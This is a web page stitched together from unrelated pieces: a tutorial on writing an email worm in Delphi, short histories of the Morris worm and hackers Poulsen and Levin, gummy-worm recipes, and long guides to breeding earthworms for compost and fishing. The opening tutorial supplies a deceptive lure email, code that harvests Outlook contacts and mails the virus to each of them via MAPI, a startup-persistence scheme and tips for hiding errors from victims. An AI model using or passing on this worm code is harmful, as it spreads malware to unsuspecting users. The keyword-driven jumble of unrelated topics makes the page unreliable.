Making silicone worms. Breeding worms at home for fishing

Today I will describe to you the principle of operation of a network virus. The topic, as you understand, is very relevant, since 70% of my personal mailbox is always filled with viruses of all kinds
- from small but evil VBS worms to one and a half megagram works of junior schoolchildren :) They don’t know about the existence of WinAPI :)

To penetrate a computer, viruses can either use bugs in the user’s software (VBS+Outlook=love:)) or bugs in the user’s head. Let's look at an example of such a viral letter:

Subj: Funny
Hello! Keep the cool joke that I promised to you (or not to you, I don’t remember :)). But keep it anyway. Don't worry, it doesn't actually format anything!
Don’t forget to check, you paranoid :)
Good luck!
Attach: fake_format.exe

Well, here it is: every lame Internet user constantly sends jokes to his friends, and, accordingly, does not really remember who he promised what to; the message about “fake formatting” switches the victim’s brains to jokes, and blind faith in antiviruses
- finishes off 🙂 Let me remind you that the algorithms I described are not determined by any webs, avp and other fighters.

In short, I already wanted to start this funny joke myself. I'm launching it :)

Error... intel pentium 5 not found!

Oh... It doesn't seem to work? No, I didn’t guess 🙂 In fact, the virus immediately transferred its body to the victim’s hard drive, signed up for startup, and will now hang out in the RAM (hint: in medical jargon, “RAM” is OPERATIVE SURGERY, so be careful;)) victims according to the principle described by me in the article “Do-It-Yourself Resident Virus”. Only it will not check the launch of files, but the connection to the Internet 🙂 (in the source code this will be the IsOnline procedure, so for the future;)). However, at the same time
no one is stopping you from monitoring the launch of files
- it’s still a virus, even though it’s a network virus. Therefore, I will include the InfectFile procedure in the logic. So we will use the following functions and procedures:

ISONLINE - checking Internet connection
SENDVIRUS - guess three times 😉
GETMAILS - get addresses from Outglitch's AddressBook
WORKMEMORY - almost the same as in the previous article, but with modifications.


Before the actual coding begins, this time a lot of preliminary caresses will be necessary :) I’ll explain why: to read the address book, we will access Outlook via the interprogram interface, and for this it’s not bad for us to use its type library. So do: project import type library, and look there... that's right, Outlook express v.9 or whatever you have. The ninth version is considered to be, if I'm not mistaken, from Office2k. Imported? What does "not on the list" mean? Okay, it happens. Search manually
- in the directory with the office there is a file msoutl.olb. This is it 😉 Now write outlook_tlb in the uses section and you will have access to the most intimate places in your address book 🙂 Oh, I’m kind of preoccupied today 😉
In general, the procedure for gutting the address book should look like:

ComObj, outlook_tlb,
Procedure GET MAILS;
MyFolder, MSOutlook, MyNameSpace, MyItem: Variant; s:string;
num, i: Integer;
mails: array of string;

MSOutlook:= CreateOleObject("Outlook.Application");
MyNameSpace:= MSOutlook.GetNameSpace("MAPI");
MyFolder:= MyNamespace.GetDefaultFolder(olFolderContacts);
for i:= 1 to MyFolder.Items.Count do
MyItem:= MyFolder.Items[i];
mails[i]:= myitem.email1addres;

Well, did you enjoy what I wrote? Gee, it's only going to get worse. Because the virus will be sent using a pure API. And this, as Horrific says: “the same as manual sex. There is an effect in both cases, but it takes a long time to achieve it and there is no such buzz” :) Well
so what did I write here? Uses Comobj allows us to work with COM technology; Then we just create an OLE Outlook object and cyclically find out the list of emails from it. If you want to find out anything else
- this is also real, read the documents - they rule. Even in English. The list of emails is written to a dynamic array of strings. It will be used by the SendVirus function. This one:

function SendVirus(const RecipName, RecipAddress, Subject, Attachment: string): Boolean;
MapiMessage: TMapiMessage;
MapiFileDesc: TMapiFileDesc;
MapiRecipDesc: TMapiRecipDesc;
with MapiRecipDesc ​​do begin
ulRecerved:= 0;
ulRecipClass:= MAPI_TO;
lpszName:= PChar(RecipName);
lpszAddress:= PChar(RecipAddress);
ulEIDSize:= 0;
lpEntryID:= nil;

with MapiFileDesc do begin
ulReserved:= 0;
flFlags:= 0;
nPosition:= 0;
lpszPathName:= PChar(Attachment);
lpszFileName:= nil;
lpFileType:= nil;

with MapiMessage do begin
ulReserved:= 0;
lpszSubject:= nil;
lpszNoteText:= PChar(Subject);
lpszMessageType:= nil;
lpszDateReceived:= nil;
lpszConversationID:= nil;
flFlags:= 0;
lpOriginator:= nil;
nRecipCount:= 1;
lpRecips:= @MapiRecipDesc;
if length(Attachment) > 0 then begin
nFileCount:= 1;
lpFiles:= @MapiFileDesc;
end else begin
nFileCount:= 0;
lpFiles:= nil;

Result:= MapiSendMail(0, 0, MapiMessage, MAPI_DIALOG

Did you swell while reading this? Go and have a beer, otherwise you won’t understand anything.
Did you drink? Me too 😉 Okay, let's continue. You will use it like this:

For i:= 1 to length (mails) do

We'll be using MAPI uses here, so don't forget to declare it. In short, this
- low-level work with mail. And to work with mail, as you know, you need to have a)
recipient's email b) letter text c) attachment. This is what I do:
MapiRecipDesc ​​- describe the recipient, MapiFileDesc - attachment,
those. our virus, MapiMessage is a message, then I will send it to the big world with the MapiSendMail command 😉 Well, it turned out to be not so difficult. The main thing is to understand that your greatest friend
- this is not c:\porno, but win32.hlp :)

How can we now fit all this verbiage into the harsh logic of the virus? You’ll figure it out for yourself, I’ve been telling you about this for 2 articles in a row. And anyway, I celebrated my girlfriend’s birthday yesterday, and now my head is a little pounding :) Well, okay, the sense of duty is stronger. Just Do It:
The first line is to check the name of the file where you started from. If
pricol.exe means CopyFile to Windows :) And if you started from the Windows directory
- then cyclically check your connection to the worldwide 😉 network. We check:

function IsOnline: Boolean;
RASConn: TRASConn;
dwSize,dwCount: DWORD;
RASConns.dwSize:= SizeOf(TRASConn);
dwSize:= SizeOf(RASConns);
Res:=RASEnumConnectionsA(@RASConns, @dwSize, @dwCount);
Result:= (Res = 0) and (dwCount > 0);

So. If everything is okay, then go ahead - shake your address book and send out the mail. There are two tricks here. If your name
pricol.exe - immediately check the connection. The user may be checking email online. This will greatly increase our chances of getting a newsletter. You've already figured out the second trick yourself,
namely, in the scenario I described, you will always send identical letters to the same user, only because he was not erased from the address book. Therefore, write down all processed addresses in a log file and constantly check it. That seems to be it. Although no. Don’t forget to enclose error-prone code fragments in try..except. And put the key ($D-). Because if the user suddenly catches an error like “FUCK” is not valid integer value,” he will suspect something.


This last article is about viruses debugged for Windows 9x. I recently formatted the screw and installed WindowsXP Professional, so the following examples will be for it. And you can already slowly buy Delphi 7, since I sowed my sixths somewhere, and now I’m sitting completely naked :) I will buy the sevenths, accordingly 😉

The next article will probably be devoted to steganography and its practical implementation.

Creation of the first "worm"

Hackers not only invaded networks back in the day, they also contributed to the creation of the first worms spread over the Internet. The concept of a worm is somewhat different from classic hacking, but worms operate on the same principle, but instead of breaking into the network themselves, the hacker sends a small program programmed to perform specific tasks. This is how Robert Tappan Morris, now a tenured professor at the Massachusetts Institute of Technology (MIT) Computer Science and Artificial Intelligence Laboratory, created the first Internet worm.

Again, Morris was inspired to create the worm by curiosity. According to him, the main goal of his program was to estimate the true size of the Internet, i.e. determine the number of computers connected to it. There weren't many machines connected to the Internet at the time, but contrary to Morris's calculations, his worm caused far more damage than expected.

A more dangerous "worm" than originally thought

The Morris worm, sent from MIT computers, was programmed to scan the computer and copy itself into the system if the machine was not already infected. The trouble began when Morris came up with the idea that some system administrators might come up with a trick with fake copies to trick the worm into thinking the computer was already infected. Then he modified the program code so that the worm left copies of itself every time, regardless of whether the computer was infected or not.

Morris's "worm" spread like wildfire, infecting several thousand computers in just a few hours. It is estimated that restoring each infected system will cost between $200 and $53,000, depending on the computer. Various teams of programmers were mobilized to stop the worm, and it took several days to neutralize the attack.

Robert Tappan Morris was found guilty of computer fraud and was sentenced to three years probation, 400 hours of community service and a $10,050 fine.

Kevin Poulsen is another name that entered the annals of the FBI in the 80s. He was first arrested in 1989, when he was 24 years old. Then he was accused of several hacks of telephone networks and computer servers, and various incriminating evidence was collected against him. But when it came time to stand trial, Poulsen decided to go into hiding, with FBI agents tracking him for 17 months. It was during this time that he committed his most famous hacking act.

A quiz and raffle was held live on the Los Angeles radio station KIIS-FM. Listeners were invited to call the radio station and try to win a Porsche 944 S2. The prize was to go to the 102nd radio listener who called. Kevin Poulsen took action: he blocked the telephone network so much that no one could get through to the radio except himself. Consequently, Kevin became the 102nd person to call and won the prize. Poulsen "rubbed off" the FBI, forcing the authorities to start searching for him again, because after that he disappeared.

In April 1991, the FBI was finally able to arrest Poulsen. The capture was facilitated by an anonymous tip: someone told authorities that Poulsen was shopping at a supermarket on the outskirts of Los Angeles. In 1994, he was charged and eventually sentenced to four years in prison. At the time, this was the harshest sentence handed down by a court for hacking.

People don't just hack out of curiosity and passion; sometimes there's money involved. The most striking example is bank robbery in order to obtain money, sometimes it was possible to steal millions. Thus, Vladimir Levin gained notoriety for stealing several million dollars under strange circumstances.

In 1994, Levin penetrated the internal network of the American bank Citibank, hacking the bank's analog modem connection and gaining access to several accounts. He managed to transfer $10.7 million to accounts in the USA, Finland, Germany, Israel and the Netherlands. Levin was helped by three accomplices who were supposed to return the stolen money.

However, his accomplices were arrested when they tried to steal the stolen money. Their interrogation led to the trail of Levin, who worked as a programmer in St. Petersburg. The Russian hacker was arrested in March 1995 at London Heathrow Airport. The trial against him began only in September 1997 and ended in February of the following year. Levin was sentenced to three years in prison.


An easy and fun way to make fun gummy worms at home, just like from the store, but without the chemicals! It’s very simple and entertaining, you can even involve children in the process of creating your worm army, they will really like it!

Recipe for gummy worms at home No. 1

So, you will need:

  • A mixture of making jelly in bags, choose the colors you like, but pink, orange, yellow look best;,
  • Water;
  • Tubes.

How to cook:

  1. You need to dilute the powder for making jelly in hot water until it completely dissolves, please note that you need to take 1.5 times less water than indicated on the package.
  2. Cool.
  3. Cut the tubes in half and place them in a glass so that they fit snugly to the bottom and to each other.
  4. Pour the prepared mixture into tubes and put in the refrigerator for at least 6-8 hours, for example overnight, for more beautiful worms we can give the following advice - pour a little into the tubes and put in the refrigerator for an hour, then add more, then for an hour 6.
  5. Remove the sticks, making sure the gelatin is completely set, place the tube under running hot water for a few seconds and gently squeeze out your worms.
  6. Place them on baking paper and place them in the refrigerator for another 2 hours.

Recipe for gummy worms at home from all-natural ingredients No. 2

  • Powdered sugar 100g;
  • Gelatin 20g;
  • Water 100ml;
  • Berries 250g.

How to cook:

  1. Gelatin must be soaked in water or juice in advance for about 40 minutes.
  2. The berries must be carefully sorted, washed and ground in a blender or crushed in any convenient way.
  3. Add powdered sugar to the berry puree and mix everything thoroughly.
  4. Bring gelatin to a boil and add to the puree, mix thoroughly.
  5. Pour the prepared mass into the tubes (see previous recipe).
  6. Minimum hardening time is 6-8 hours, longer is better.
  7. We take the worms out of the molds; if desired, they can be sprinkled with powdered sugar or sugar.

Breeding worms at home for beginners is also attractive due to the simplicity of the equipment used. The growing technology is simple and does not require special knowledge. Also tempting is the lack of dedicated breeding facilities. At the initial stage, you can start a business in an ordinary apartment.

If you decide to do such an unusual business, you should know that you can sell the worms themselves, vermicompost and worm tea. Vermicompost is an excellent fertilizer.

Worm tea is a unique product that will increase productivity by at least two times. It is effectively used for growing strawberries, indoor plants, and for growing vegetables and fruits both in greenhouses and in open ground. In order for a business to develop effectively, it is necessary to create the most comfortable conditions for the life and reproduction of worms.
How to breed earthworms at home and how to make this activity grow into a business - this will be discussed further.

What benefits do worms bring?

Earthworms are soil animals that feed on rotting plant debris and animal excretions. They absorb bacteria, algae, protozoa, nematodes, fungi and their spores. Passing food through their intestines, the worms destroy it and mix it with the soil.

By processing compost heaps, they leave in the soil the most valuable forms of humus with high microbiological activity. Processes occur in the intestines of the worm, as a result of which the breakdown products of organic substances are converted into molecules of humic acids. The molecules combine with the mineral components of the soil, forming calcium humates. These substances give the soil structure.

The soil processed by worms contains a wide variety of enzymes, amino acids, vitamins, antibiotics, and biologically active substances that disinfect microflora. And worms play a dominant component in this process. In addition, these animals take an active part in loosening the soil, which makes it water- and breathable.

Earthworms are an indicator of the health and fertility of garden soil. If they feel good on your site, then the harvest will be good. Their normal density should be no less than five large worms per 1 square meter of dug area. If this amount is less, then the land needs organic fertilizer.

You should know that worms help neutralize the acidity of the soil, since they prefer a neutral environment. They eat straw, loosen the soil, and reduce the number of nematodes.

Types of worms

Let's look at what types of worms you need to buy for breeding and how they differ.

Regular rain

Earthworms are invertebrate animals whose body consists of ring-shaped segments with short bristles. The body is smooth, slippery, cylindrical, 15-30 cm long. The body of the worm moves based on the bristles. The ventral side is flat, the back is convex and dark in color.

The earthworm is a hermaphrodite but reproduces sexually through mating. The thickening on the front is called the girdle. There are glands that secrete a sticky liquid. The animal wraps its eggs in mucus during reproduction. A cocoon of mucus protects the eggs from dampness and adverse factors. After a while, small worms come out of it. The lifespan of an earthworm is 3-4 years.

The earthworm does not have sensory organs, but perceives irritations with the help of the nervous system and reacts to them reflexively. It also has no organs of vision, but it perceives light stimulation. Earthworms sense odors and are capable of regenerating lost body parts.

California red

One variety of earthworm is the California red worm, which is often bred at home. Compared to earthworms, Californian ones have many advantages in breeding, growing, and feeding. This animal reaches 6-8 cm in length and weighs 1 g. Reproduction occurs at three months of age.

With proper care, each individual produces up to 500-1500 pieces of its own kind per season. The Californian worm is distinguished by both high fertility and longevity. Its lifespan is about 16 years. The only drawback of the California worm is that it is very thermophilic and does not crawl deeper into the soil when the temperature drops.


The prospector worm is the result of selective breeding. This species was obtained in 1982 as a result of crossing southern and northern dung worms. A distinctive characteristic of the animal is the presence of the instinct of self-preservation. At low temperatures it goes to a safe depth. This species reproduces in a much wider temperature range - +8...+29 °C.

The productivity of the prospector worm is higher than that of the ordinary earthworm. He is unpretentious, does not get sick and is distinguished by his perseverance in the substrate. Unlike the California red worm, the prospector worm easily switches from one type of food to another. The reproduction rate and life expectancy are the same as the Californian one, but this species retains high viability and productivity at a high density of the substrate.

Technology for growing worms at home

In order to obtain the required amount of vermicompost to fertilize your garden, you should think about breeding earthworms at home.

The recipe for a fertile soil mixture is simple. You should add 1 kg of sand and 5 kg of vermicompost to 1 square meter of black soil.

How to choose a place

If you decide to start breeding worms, you should know that this requires a mini-farm or vermicomposter. The worm coop can be placed anywhere: on the balcony, in the apartment, in the yard, in the garden, in the garage or any utility room. It should be a place without noise and vibration. During the processing process, the structure does not emit any unpleasant odors. The main thing is that the temperature in the room is within acceptable limits.

At temperatures above 36 °C the worms will die.

The food may give off an odor. In this case, it must be sprinkled with vermicompost or soil.

Types of worms

For breeding worms, wooden or plastic boxes made of food-grade plastic 30-40 cm high are often used. The containers must have ventilation. To do this, use a drill to drill holes in the top of the box along the entire perimeter and in the lid along the entire area. Boxes must be installed on legs at an angle. Then the vermicelli can drain through the hole in the bottom. Place the container to collect it under the hole.

Worms also do well in cardboard boxes. They feed on pieces of cardboard. True, the boxes get wet, and they often have to be replaced with new ones.
An old refrigerator is also suitable for breeding. It is installed with the door facing up. Don't forget to make holes for ventilation.

The most convenient, but expensive equipment for breeding worms is a special vermicomposter. It consists of several plastic boxes that are placed on top of one another. Each has side vents and slots at the bottom to allow water to pass through. The bottom drawer is placed on legs. There is a tap installed in its bottom for draining the vermicelli. The top drawer is covered with a blanket to maintain humidity and a plastic lid.

Instructions for making a homemade worm trap

Let's look at how to build a worm farm with your own hands, where to start making it and what tools you will need.

For a homemade worm trap, identical plastic food boxes are most suitable. They fit well vertically and fit into each other. The box must be solid, without holes, size 60 × 40.

The bottom box will be used to collect the soil solution, the top boxes will be used to contain the worm. On top you can place three compartments for growing a worm. In the bottom drawer, use a drill to drill a series of holes on top of the sides. But you should not make holes in the corners (up to 10 cm), since the soil solution will drain through them.

In the second box you need to make the same holes, but around the entire perimeter. In the bottom of the second box we make slits parallel to the stiffening ribs using a grinder (approximately 8 pieces). Use a chisel to clear the surface of burrs. We produce 3 boxes of the second type.

At the bottom of the boxes we lay a row of wooden rods as thick as a finger. They will prevent the bottom holes from clogging. It is necessary to sew bags from high-density spunbond fabric. They are laid on top of the rods. It is necessary to cut out plastic mesh to move the worms into a new box. They are used when there is 5 cm left until the box is full, and continue to feed the worm. Then, when the box is full, the worms will be in the net and can be moved.

We repeat the relocation procedure three times until the worm is completely captured. The top cover is made of plywood. Using a drill we make its perforation.

What equipment will you need?

To breed worms at home, you need to purchase a small amount of equipment: scales, wheelbarrow, sieve, shovel, pitchfork, bucket, thermometers for measuring soil and air temperature, device for measuring soil acidity, racks, boxes for growing worms.

Soil selection

The reproduction and life of worms depends on the quality of the soil. Half the container must be filled with humus with the addition of crushed cardboard. The soil should have a moisture content of 70-80%. It's easy to check. To do this, take a handful of soil in your hand and squeeze it tightly. If 1-2 drops of water are released as a result of compression, then the soil has the required moisture.

When starting a business, you should not immediately buy expensive vermicomposters. Use a wooden or plastic food box. It is necessary to make a hole in it for fluid drainage and ventilation. The room must have a temperature range of 18-25 °C, lighting of 60 W at 20 m, ventilation no more than 0.5 m/s. You should be aware that chlorinated water inhibits worms, so use water containers. Take care to protect worms from pests. They are eaten by moles, rats, and other rodents.

Purchase of breeding stock

You can buy worms for breeding both on the Internet and from local worm farm owners. When purchasing breeding stock, you should pay attention to the appearance of the worm. It should be red and mobile. The breeding stock includes at least 1500 worms. The calculation must be made from the following ratio: 1-3 families are needed per 1 cubic meter of soil for breeding.

How to check in

2-3 days after preparing the soil, it is necessary to make a hole in it and move the first inhabitants there. After this, carefully spread the soil and close the lid. After a couple of days you need to add food.

In order to determine the required acidity of the soil and check whether the worms will take root well in the new house, it is necessary to do a test colonization in a small container. Based on the results, you can determine whether the optimal acidity level has been reached or needs correction.
The optimal acidity level for breeding worms should be in the range of 6.6 - 7.5 pH.

If there are a lot of dead worms, then the acidity needs to be changed. It is increased by adding straw, sawdust, and plants. To reduce the acidity of the soil, it is necessary to add chalk, limestone, and shells.
Within a week after moving in, you need to check how the worms feel in their new home. If the surface of the substrate is clean and they are mobile, then the relocation was successful.

What to feed

What to feed worms at home?
Worms are not picky about food. They feed on dead or beginning to rot plants. It is recommended to give potato peelings, cabbage leaves, banana peels, stale bread, tea or coffee grounds, straw, grass, water from a container washed from sour cream or kefir, and chicken droppings.

Worms can be classified as vegetarians. Citrus fruits, meat, and eggs should not be added to their food. You should not add fresh manure to the worms, as it generates heat up to 70 ° C.

All food you give to worms should be ground up. They cannot process it in solid form. The feed composition should be maintained at a constant level. Worms are better attuned to the food that they tried for the first time in their lives. When food changes, individuals must adapt over a period of time.

Rules of care

Growing and caring for worms at home includes feeding, maintaining a favorable temperature, watering and loosening the substrate.

The first feeding is carried out a few days after settlement. To do this, feed 3-5 cm thick is placed on a quarter of the surface and distributed evenly. Next time, the food is applied 5-7 cm thick over the entire surface of the box.

Feeding is added to the worms every 1.5 - 2 weeks, as they are eaten, until the box is filled to a height of 50-60 cm. The frequency of feeding depends on the number of worms and the temperature of the contents. Worms must be kept at a temperature of +15…+25 °C. Worms reproduce quite quickly, so it is necessary to have prepared boxes for transplantation. One family after overwintering increases 10 times.

It should be remembered that worms need moisture. Therefore, the substrate must be watered regularly. The optimal humidity should be 80%. This procedure must be done using a watering can with small holes and settled or rainwater at a temperature of 24 °C.

Worms need oxygen, so if the substrate layer is 20 cm or more, it must be loosened regularly. This procedure is carried out with special forks with round ends. To do this, the substrate is pierced without mixing the layers twice a week to the depth of the worms.

As a result of their active activity, the substrate in the box is divided into three zones.

The top layer contains nutrients and organic residues. The middle layer is for worms to live in. The bottom layer is the most valuable. It collects all the products of soil processing, which are used as vermicompost and worm tea. As the worms work, the bottom layer constantly increases. The duration of the complete recycling process in one box is 3-4 months. After this, the worms with part of the old substrate are transplanted into another container, and everything starts all over again.

What and to whom to sell from the vermifarm

The main advantage of a worm farm is that you can get valuable fertilizer and good income from unnecessary waste. To do this, you need to study the market and potential buyers.

To fertilize the soil

To fertilize a plot of 3-4 acres, it is enough to purchase 1.5 - 3 thousand worms.
Throughout the year they will produce the required amount of vermicompost. This valuable fertilizer can be sold to neighbors and acquaintances. When expanding the worm farm, it can be offered to specialized stores and farms.

For fishing

Growing worms for fishermen and selling them at bazaars or selling them to specialized stores is also profitable, since this is part of the worm business. A fisherman rarely takes the time to dig up the soil in search of a worm. It's always easier to buy it. Fishing stores will take your product because the worm's lifespan is long and demand is strong. The main thing is that the packaging facilitates the life of the worms for a certain period. The worm is the most valuable product for fish. Therefore, real professionals often breed worms at home for fishing.

To the pet store

The pet store also needs a constant supply of fresh worms and vermicompost. Worms are used there as food for fish, birds and other inhabitants.

For fish farms

For effective operation of fish farms and normal growth of fish, it is necessary to use live food to feed them. Therefore, the need for worms as an irreplaceable product with high nutritional value is constantly increasing.

For feeding plants

The vermicompost obtained from the vermifarm can be used for growing indoor flowers, seedlings, vegetables in a greenhouse and in the garden, for planting fruit crops, grapes, and medicinal plants. Vermicompost is especially valuable in greenhouses, since it is important to eliminate the likelihood of diseases. If worms get into flower pots, there is no need to worry. Worms cannot cause any harm to plants. Since the use of vermicompost is quite widespread, the demand is obvious.

To expand the range, you can also offer vermichai. It is made in worm farms by slowly passing water through a stack of containers or using a recipe. To do this, mix vermicompost with water in a ratio of 1:10. Saturate it with oxygen for good bacterial growth. This can be done using an aquarium compressor. Infuse for 24 hours at room temperature, after which the solution is settled and filtered. The sediment can be used as fertilizer, and the solution can be used for foliar and root feeding.

Vermicelli should be used within 4 hours after turning off the compressor. With further storage, the bacteria die, the effectiveness of the solution decreases, and it emits an unpleasant odor.

How to prepare worm farm products for sale

    The main products of the worm farm for sale are:
  • worms;
  • vermicompost;
  • worm tea.

To prepare food for sale, it must be properly packaged and stored. You can pack worms in thick plastic bags with holes for ventilation. They should be stored in a cool place to avoid excessive worm activity. A sufficient amount of soil must be added to the bag.

Royal colonies for sale are best packed in cardboard boxes. The family should consist of cocoons, fry and adults.

Biohumus is a dark-colored spreading mass. After removing the worms, it is collected with a scoop, dried to a moisture content of 40-50%, sifted using a sieve and packaged for storage. Vermicompost can be stored at temperatures ranging from -20 to + 30 °C. To prevent the fertilizer from losing its biological activity, you should not freeze it.

Vermichai is packaged in plastic bottles before sale. Do not forget to indicate the expiration date of the solution.

Profitability calculation

From 1 cubic meter of nursery you can get up to 10 thousand worms and about 0.5 tons of vermicompost per year. When selling 1 worm for 2 rubles, you can get 20 thousand from the sale of worms alone, not taking into account the profit from vermicompost and vermicelli. business, we get 150%. As you can see, the revenue is quite decent.

Is it possible to make money in a business like growing strawberries all year round in a greenhouse? Let's try to answer this question in a separate one.

Champignons grow well in artificial conditions. The demand for champignons in the food market makes them attractive for entrepreneurship.

Pros and cons of business

Breeding worms is a profitable and useful business. This business involves minimal risks, so if you are interested, you should try it first in an old refrigerator or wooden box. Having mastered the cultivation of worms at home from videos and in practice, having studied all the intricacies and having worked with the sale of products, you will decide whether it is worth expanding your business. There are practically no disadvantages to running a worm business, as evidenced by reviews from entrepreneurs. If taken seriously, the business will generate considerable income.

Avid fishermen know that the catch depends entirely on bait and it is very good if you do not have to go to special stores, but have the opportunity to collect it on your own site. From the article you can learn how you can breed a variety of worms in your garden, barn, and even in your apartment, which are used for fishing.

What worms are used by fishermen

Not all worms encountered in our area are suitable for bait. Only a few varieties are in demand among fishermen.

  1. Crawlers or earthworms. They got their name due to their ability to appear on the surface of the soil, crawling out of deep burrows only after rain. These are large worms, among which there are real giants up to 30 cm in length. As bait, crawlers are suitable for catching almost all freshwater fish.
  2. Dung worms. Judging by the name, you can immediately guess their habitat. These creatures are painted dark red, are small in size and live in colonies, which makes them much easier to collect. Great for attracting fish.
  3. Subfoliates. They live in piles of leaves, under logs and stones. Medium size, dark purple color. Among the disadvantages, one can note the property of easily falling off the hook.
  4. Red Californian worms. This variety was obtained artificially from the dung specimens described above. Unlike unpretentious parents, they require certain conditions when growing: peace, quiet, warmth and suitable soil moisture.

All of the listed species, when certain conditions are created for them, live quite well and reproduce quickly in ordinary garden plots. During the cold season, worms can be bred indoors.

How to breed crawling worms

In their natural form, these worms live in the soil, where the remains of plant organic matter can be found, which is what they feed on. By passing soil through their intestines, crawlers transform it into nutritious humus, and thanks to the underground passages they make during movement, air exchange in the soil significantly improves. Gardeners have long noticed that plants grow better where earthworms live.

It’s quite simple to build a worm hutch on your property and breed crawlers in it. If this is the warm season, then it is enough to dig a small trench and fill it with garden soil mixed with half-rotten leaves and humus. In a few days, it will be possible to find a sufficient number of individuals there for fishing.

Attention! When setting up a worm pit, it is important to ensure that no ashes or coals get into the soil. Worms can't stand this.

When cold weather sets in, worms can be kept in a barn, on a balcony, in a basement, etc. The main condition for them is that the room temperature should not be lower than +15°C.

They make a worm like this:

  1. Take a shallow (about 20 cm) wooden box with gaps on the sides.
  2. The inside is lined with breathable material (burlap, lutrasil, etc.).
  3. The container is filled with earth mixed with chopped hay and the remains of leaves.
  4. The substrate is moistened and 20-30 individuals are placed on its surface.

In the future, you need to monitor the soil moisture and regularly add plant debris and other food that the worms eat into the box.

Advice. The soil in the box should be stirred regularly. This way moisture and feed are distributed evenly. In addition, thanks to this action, the worms do not bunch up into dense balls, within which they can die.

How to Grow Dung and California Worms for Fishing

The box for these varieties is prepared in the same way as for rain varieties. The substrate in which the red worms will live is prepared with a slightly different composition. It includes:

  • straw;
  • manure;
  • sawdust;
  • hay;
  • Earth.

All components are mixed well, placed in boxes, moistened and compacted well.

Attention! The environment where the worms live should always be moist. At 22%, the inhabitants of the wormhole may die.

The acidity of the soil in which it is planned to raise pets should be within pH6-pH7. At pH9 or pH5, worms do not live. The temperature in the room with worm hutches should be about +24°C. When it gets colder, the worms begin to eat less, burrow deeper into the soil and go to sleep.

Pets are fed all kinds of plant and food waste. Leftover bread, various cereals, dry rolled oats and bran are suitable.

Advice. In order for worms to reproduce better, you need to introduce dairy products into their diet: low-fat cottage cheese, kefir, yogurt.

Breeding worms at home is more troublesome than buying them in a store. But, if you have a home worm farm, you will always have an unlimited amount of excellent bait at hand. And this, whatever one may say, is already half the success of fishing.

How to breed worms at home: video